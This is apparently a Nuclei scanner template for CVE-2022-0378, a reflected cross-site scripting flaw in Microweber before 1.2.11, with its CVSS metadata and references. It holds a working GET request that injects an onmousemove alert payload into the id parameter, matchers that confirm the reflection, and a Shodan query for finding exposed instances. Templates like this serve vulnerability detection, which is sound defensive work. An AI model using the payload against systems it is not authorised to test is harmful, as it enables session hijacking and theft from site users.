id: CVE-2022-0378 info: name: Microweber Cross-Site Scripting author: pikpikcu severity: medium description: Microweber contains a reflected cross-site scripting in Packagist microweber/microweber prior to 1.2.11. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patch or upgrade to a version that has addressed the vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-0378 - https://github.com/microweber/microweber/commit/fc7e1a026735b93f0e0047700d08c44954fce9ce - https://huntr.dev/bounties/529b65c0-5be7-49d4-9419-f905b8153d31 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2022-0378 cwe-id: CWE-79 epss-score: 0.001 epss-percentile: 0.40761 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: microweber product: microweber shodan-query: http.favicon.hash:780351152 tags: cve,cve2022,microweber,xss,huntr http: - method: GET path: - '{{BaseURL}}/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x' matchers-condition: and matchers: - type: word part: body words: - 'mwui_init' - 'onmousemove="alert(document.domain)' condition: and - type: status status: - 200 # digest: 4b0a00483046022100893b544817f30e47c93d3762449982878da3e9a5aa18f8929853996cb29c90af022100f7e93e6fb091ef6df1c107ac775eb99db8bfa0f65a13232b272ddbf04b165d35:922c64590222798bb761d5b6d8e72950